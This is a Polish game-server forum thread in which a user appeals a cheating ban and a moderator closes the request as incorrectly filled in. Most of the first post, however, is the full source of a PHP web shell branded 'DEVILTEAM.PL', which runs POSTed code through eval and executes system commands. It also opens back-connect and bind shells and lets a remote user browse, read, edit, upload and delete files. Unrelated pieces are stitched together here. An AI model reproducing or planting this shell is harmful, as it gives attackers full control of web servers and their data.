Użytkownik ProxyOG Posted May 30, 2018 Użytkownik Share Posted May 30, 2018 '; $lolek = ''; function pobierz($file) { @ob_clean(); header('Content-Length:' . filesize($file) . ''); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); readfile($file); exit; } echo ' '; echo " "; if (isset($_POST['ZDALNIE']) == "true") { @ob_clean(); if (@$_POST['LOGIN'] == $login && @$_POST['PASSWORD'] == $password) { if (isset($_POST['EVAL'])) { eval($_POST['EVAL']); } elseif (isset($_POST['CMD'])) { echo komendy($_POST['CMD']); } } exit; } echo ' '; //logowanie if (@$_POST['action'] == "wyjscie") unset($_SESSION['an']); if ($auth == 1) { if (@$_POST['login'] == $login && @$_POST['password'] == $password) $_SESSION['an'] = 1; } else $_SESSION['an'] = '1'; if (@$_SESSION['an'] == 0) { echo ' Login: Hasło: '; exit; } if (isset($_POST['bbc']) == "start") { //back bind connect if (isset($_POST['port']) && isset($_POST['ip']) && $_POST['port'] != "" && $_POST['ip'] != "") { ini_set('max_execution_time', 0); @ob_clean(); echo " Now trying to connect! "; $ip = $_POST['ip']; $port = $_POST['port']; $sockfd = @fsockopen($ip, $port, $errno, $errstr); if ($errno != 0) { echo "$errno : $errstr"; } else if (!$sockfd) { $result = " Fatal : An unexpected error was occured when trying to connect! "; } else { fputs($sockfd, " --== DEVILTEAM.PL ==-- "); $pwd = komendy("pwd"); $len = 1337; fputs($sockfd, "uname: " . @php_uname() . " "); fputs($sockfd, "pwd: " . $pwd . " "); while (!feof($sockfd)) { $cmdPrompt = "(Shell)[$]> "; fputs($sockfd, $cmdPrompt); $command = fgets($sockfd, $len); fputs($sockfd, " " . komendy($command) . " "); } fclose($sockfd); } exit; } } if (isset($_POST['bbc2']) == "start") { if (isset($_POST['port']) && isset($_POST['passwd']) && $_POST['port'] != "" && $_POST['passwd'] != "") { @ob_clean(); $address = ''; $port = $_POST['port']; $pass = $_POST['passwd']; set_time_limit(0); if (function_exists("socket_create")) { $sockfd = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if (socket_bind($sockfd, $address, $port) == FALSE) { echo "Cant Bind to the specified port and address!"; } socket_listen($sockfd, 15); $passwordPrompt = " --== DEVILTEAM.PL ==-- Please Enter Password : "; $client = socket_accept($sockfd); socket_write($client, $passwordPrompt); $input = socket_read($client, strlen($pass) + 2); // +2 for if (trim($input) == $pass) { socket_write($client, " "); socket_write($client, "-- DEVILTEAM.PL HAURU SHELL -- "); socket_write($client, " "); while (1) { $commandPrompt = " (Bind-Shell)[$]> "; $maxCmdLen = 31337; socket_write($client, $commandPrompt); $cmd = socket_read($client, $maxCmdLen); if ($cmd == FALSE) { echo "The client Closed the conection!"; break; } socket_write($client, komendy($cmd)); } } else { echo "Wrong Password!"; socket_write($client, "Wrong Password , Please try again "); } socket_shutdown($client, 2); socket_close($socket); } else { echo "Socket Conections not Allowed/Supported by the server! "; } } exit; } //koniec logowanie function createdir($dir) { if (@mkdir($dir)) echo "Done."; else echo "error"; } //crdir if (@$_POST['file'] != "") { $file = $_SESSION['file'] = $_POST['file']; } else { $file = $_SESSION['file'] = ""; } //Typ OS if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $win = 1; else $win = 0; if (@get_magic_quotes_gpc()) { foreach ($_POST as $k => $v) { $_POST[$k] = stripslashes($v); } } @ini_set('max_execution_time', 0); $dir = ''; $action = ''; if (isset($_SESSION['action']) == "") { $_SESSION['action'] = "przeglad"; } if (isset($_POST['action'])) { $action = $_POST['action']; } if ($action != "") { $_SESSION['action'] = $action; $action = $_SESSION['action']; } if (isset($_POST['dir']) != "") { $_SESSION['dir'] = $_POST['dir']; $dir = $_SESSION['dir']; } if (is_dir($dir)) { $dir = chdir($dir); } $dir = getcwd() . "/"; $dir = str_replace("\"," / ",$dir); $dir=str_replace(" //","/",$dir); //crdir if (isset($_POST['file']) != "") { $file = $_SESSION['file'] = $_POST['file']; } else { $file = $_SESSION['file'] = ""; } //Typ OS if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $win = 1; else $win = 0; function perms($file) { $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info.= (($perms & 0x0100) ? 'r' : '-'); $info.= (($perms & 0x0080) ? 'w' : '-'); $info.= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-')); $info.= (($perms & 0x0020) ? 'r' : '-'); $info.= (($perms & 0x0010) ? 'w' : '-'); $info.= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-')); $info.= (($perms & 0x0004) ? 'r' : '-'); $info.= (($perms & 0x0002) ? 'w' : '-'); $info.= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-')); $ea = count(explode("-", $info)); for ($i = 0;$i <= 11;$i++) { if ($ea <= $i) { switch ($ea) { case "0": $kolorek = "#00CC00"; break; case "1": $kolorek = "#00CC00"; break; case "2": $kolorek = "#00CC00"; break; case "3": $kolorek = "#009900"; break; case "4": $kolorek = "#006600"; break; case "5": $kolorek = "#00FF00"; break; case "6": $kolorek = "#FFCC00"; break; case "7": $kolorek = "#FF9900"; break; case "8": $kolorek = "#FF6600"; break; case "9": $kolorek = "#FF3300"; break; case "10": $kolorek = "#FF0000"; break; case "11": $kolorek = "#FF0000"; break; } $kolor = '' . $info . ''; return $kolor; } } return $info; } function view_size($size) { if ($size >= 1073741824) { $size = @round($size / 1073741824 * 100) / 100 . " GB"; } elseif ($size >= 1048576) { $size = @round($size / 1048576 * 100) / 100 . " MB"; } elseif ($size >= 1024) { $size = @round($size / 1024 * 100) / 100 . " KB"; } else { $size = $size . " B"; } return $size; } function ext($str) { for ($i = 1;$i < strlen($str);$i++) { if ($str[strlen($str) - $i] == ".") return substr($str, strlen($str) - $i, strlen($str)); } return $str; } function deltree($f) { if (is_dir($f)) { foreach (glob($f . '/*') as $sf) { if (is_dir($sf) && !is_link($sf)) { mkdir($sf); } else { unlink($sf); } } } rmdir($f); } //usun folder if ($action == "usunfolder") { deltree($file); @ob_clean(); echo ' Deleting folder... '; exit; } //usun plik if ($action == "usun") { if (is_file($file)) { unlink($file); @ob_clean(); echo ' Deleting... '; exit; } } if ($action == "sciagnij") { if (is_file($file)) { pobierz($file); } } function komendy($cmd) { $result = ""; if (!empty($cmd)) { if (is_callable("exec")) { exec($cmd, $result); $result = join(" ", $result); } elseif (is_callable("shell_exec")) { $result = shell_exec($cmd); } elseif (is_callable("system")) { @ob_start(); system($cmd); $result = @ob_get_contents(); @ob_end_clean(); } elseif (is_callable("passthru")) { @ob_start(); passthru($cmd); $result = @ob_get_contents(); @ob_end_clean(); } elseif (($result = `$cmd`) !== false) { } elseif (is_resource($fp = popen($cmd, "r"))) { $result = ""; while (!feof($fp)) { $result.= fread($fp, 1024); } pclose($fp); } } return $result; } function writef($file, $data) { $fp = fopen($file, "w+"); fwrite($fp, $data); fclose($fp); } function readf($file) { if (empty($file)) return; if (!$le = fopen($file, "r")) $contents = ""; else { $contents = @fread($le, filesize($file)); fclose($le); } return $contents; } function scandire($dir) { (@ini_get('safe_mode') == "1" ? $safe_mode = "ON (zabezpieczony)" : $safe_mode = "OFF (niezabezpieczony)"); (@ini_get('disable_functions') != "" ? $disfunc = ini_get('disable_functions') : $disfunc = 'Brak zablokowanych funkcji'); (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN' ? $os = 1 : $os = 0); echo ""; echo ""; if (is_dir($dir)) { if (@$dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { if (@filetype($dir . $file) == "dir") { $dire[] = $file; } if (@filetype($dir . $file) == "file") { $files[] = $file; } } closedir($dh); @sort($dire); @sort($files); if ($GLOBALS['win'] == 1) { echo ""; } echo ''; echo ''; echo ""; for ($i = 0;$i < count($dire);$i++) { $link = $dir . $dire[$i]; if ($dire[$i] == ".") { } elseif ($dire[$i] == "..") { echo ''; } else { echo ''; } } for ($i = 0;$i < count($files);$i++) { $linkfile = $dir . $files[$i]; $it = "file"; switch (ext($files[$i])) { case ".txt": $it = "txt"; break; case ".php": $it = "txt"; break; case ".htm": $it = "txt"; break; case ".log": $it = "txt"; break; case ".pl": $it = "txt"; break; case ".asm": $it = "txt"; break; case ".bat": $it = "txt"; break; case ".bash_profile": $it = "txt"; break; case ".bash_history": $it = "txt"; break; case ".ini": $it = "txt"; break; case ".php3": $it = "txt"; break; case ".html": $it = "txt"; break; case ".cgi": $it = "txt"; break; case ".inc": $it = "txt"; break; case ".c": $it = "txt"; break; case ".cpp": $it = "txt"; break; } echo ''; } echo " " . @php_uname() . " Otwarta lokalizacja: Wybierz dysk:"; for ($j = ord('C');$j <= ord('Z');$j++) if (@$dh = opendir(chr($j) . ":/")) echo ' ' . chr($j) . ''; echo " Status Serwera (Safe Mode): ' . $safe_mode . ' Zablokowanych funkcji: ' . $disfunc . ' Nazwy plików i folderów Typ Rozmiar Dostęp Opcje ' . $dire[$i] . ' folder ' . perms($link) . ' X [' . $dire[$i] . '] folder ' . perms($link) . ' X ' . $files[$i] . ' plik ' . view_size(filesize($linkfile)) . ' ' . perms($linkfile) . ' S E X "; } } } scandire($dir); echo ' '; echo ' Wyjdź/Wyloguj '; echo ' '; $cmdprint = ''; if (isset($_POST['cmd33'])) { $cmdprint = $_POST['cmd33']; } echo ' cmd:' . $cmdprint . ' response:'; $wynik = ""; if (isset($_POST['cmd33'])) { $wynik = ""; $wynik.= komendy($_POST['cmd33']); $dir = $_POST['dir']; if (is_dir($dir)) { $dir = chdir($dir); } echo $wynik; } if (isset($_POST['czytajj'])) { $wynik = ""; $wynik.= readf($_POST['czytajj']); $dir = $_POST['dir']; if (is_dir($dir)) { $dir = chdir($dir); } echo htmlspecialchars($wynik, ENT_QUOTES); } $lolek = ""; if (isset($_POST['action']) == "edytor") { if ($_POST['file'] !== "") $lolek = "plonie"; $wynik = ""; $wynik.= readf($_POST['file']); $_SESSION['linkfile'] = $_POST['file']; $dir = $_POST['dir']; if (is_dir($dir)) { $dir = chdir($dir); } echo htmlspecialchars($wynik, ENT_QUOTES); } if (isset($_POST['zachowajzmianyz'])) { $fhandle = fopen($_SESSION['linkfile'], "w"); fwrite($fhandle, $_POST['wynik']); fclose($fhandle); unset($_SESSION['linkfile']); $dir = $_POST['dir']; if (is_dir($dir)) { $dir = chdir($dir); } } echo ''; if ($lolek == "plonie") { echo ' '; } echo ' '; echo ' '; echo ' '; if ($GLOBALS['win'] == 1) echo $form_win; if ($GLOBALS['win'] == 0) { echo $form_win; } if (@$_POST['uploadloc']) { if (@$_POST['filename'] == "") $uploadfile = $dirupload . basename($_FILES['file']['name']); else $uploadfile = $dirupload . "/" . $_POST['filename']; if (!file_exists($dirupload)) { createdir($dirupload); } if (file_exists($uploadfile)) echo isset($GLOBALS['filext']); elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) @ob_clean(); echo ' Uploading... '; exit; } echo ' Read file function: '; if (@$_POST['dirupload'] != "") $dirupload = $_POST['dirupload']; else $dirupload = $ee; $form_win = ' Upload: Dir: (tworzy nieistniejace foldery)Nowa nazwa pliku: Back-Connect Port: IP: Bind-Connect Port: Password: Uwaga: Po kliknięciu Submit, przeglądarka otworzy strone w nowym oknie, nie zamykaj okna, chyba że skończysz! '; echo ' by DEVIL TEAM - Twoje IP: ' . $_SERVER['REMOTE_ADDR'] . ' '; Serwer: 4 Fun Map Nick podczas gry: ProxyOG Data zdarzenia: 30/05/2018 IP/SteamID: Link HLTV (w przypadku potrzeby): Nie wiem co to Link do AMXBANS'a: Co??? Opis sytuacji - Grałem na serwerze z słuchawkami, a następnie wymyśliłem 2 szczęśliwe zabójstwa 1 było strzałem w głowę, a potem nagle zostałem zbanowany za cel WH +, nie wiem, co się dzieje. Link to comment
Użytkownik 6IX9INE Posted May 30, 2018 Użytkownik Share Posted May 30, 2018 Link do amxbans'a to link do bana znajdziesz go na liście banów na forum. HLTV znajdziesz obok listy serwerów naciskając na "Nagrania" Twoja prośba o ub zostanie rozpatrzona gdy zostanie napisana poprawnie. Zamykam. Link to comment
Użytkownik 6IX9INE Posted May 30, 2018 Użytkownik Share Posted May 30, 2018 .zamknietytematkurwa Link to comment
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